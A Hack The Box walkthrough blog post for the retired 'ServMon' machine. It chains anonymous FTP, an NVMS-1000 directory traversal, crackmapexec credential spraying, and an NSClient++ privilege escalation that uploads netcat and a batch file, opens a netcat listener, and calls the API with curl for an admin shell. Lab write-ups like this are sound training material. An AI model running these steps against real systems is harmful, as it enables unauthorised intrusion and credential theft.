HTB Walkthrough ServMon

Servmon has been released on 11th of April and has been retired on 20th of June. Servmon is an Easy rated machine.


First we see we have anonymous access to FTP, there is a file that mentions there should be a passwords.txt on the desktop of nathan, after the web enumeration we find out there is a directory traversal. We can use this vulnerability to get the passwords.txt from nathans’s his desktop


After finding those passwords we still had to guess to who these belong, we have used crackmapexec for this. it turns out we have credentials for Nadine. we were able to login with ssh and read the user flag.


After some enumeration we found a program called NSClient++ on the machine, this is not a default application, after some research it turns out this application is vulnerable to get system access.



nmap -sC -sV


anonymous login

Downloading the file:

File contains there should be a passwords.txt on the desktop of Nathan


NVMS-1000 is vulnerable to Directory Traversal

Since there was a hint on the ftp we should be able to get the passwords.txt from Nathans his Desktop we do this with burp




Now we have some passwords we still don’t know where to use them and to who they belong.

From the FTP we know there should be two users, Nadine and Nathan. lets try them in crackmapexec . in the ftp were 2 users nadine and nathan so i created a user.txt with these two.

crackmapexec smb -u users.txt -p passwords.txt

valid credentials found:


Now we have some valid credentials we are able to login with SSH

ssh nadine@

Privilege Escalation

After some enumeration we see NSClient++ being installed which was also visible on the nmap scan, when we look at the following file we get some credentials. it also shows you cannot login from the outside only from localhost:

on the nmap we could see NSClient++ is running on port 8443:

When we login with the password: ew2x6SsGTxjRwXOT we get an error as expected, since this program only accepts requests from the localhost.

Now we can exploit this program two ways, trough the API or website. i decided to show you a combination of that. for both we need to create ssh tunnel so the machines thinks the request comes from the localhost.

Exploit source:

Creating ssh tunnel:

ssh -L 4433: nadine@

Configure Firefox to use the ssh tunnel

Now we should be able to visit the page with

We also should be able to login now:


First step is:

Login and enable following modules including enable at startup and save configuration
- CheckExternalScripts
- Scheduler

but since these are already enabled we don’t have to worry about that

Next step is to create a batch file and upload the batch file and Nc.exe (netcat)

In the shell I put the following commands:


cd c:\temp

python -m SimpleHTTPServer 80

wget -outfile nc.exe

wget -outfile secwalk.bat

Setup my listener

nc -lvp 443

Now it is time to exploit

Earlier I said it’s also possible to do this trough the web page or trough the api, I’m gonna show you here the combination of that:

curl -k -i -X PUT -u admin –data-binary @secwalk.bat

curl -k -s -H ‘password: ew2x6SsGTxjRwXOT’ ‘’

Now we are gonna run secwalk from the webpage

And we receive our admin shell

Job Done

Made by S3cwalk

Disclaimer: Please use our posts for educational purposes only. Wrong usage could make you end up in jail.

Leave a Reply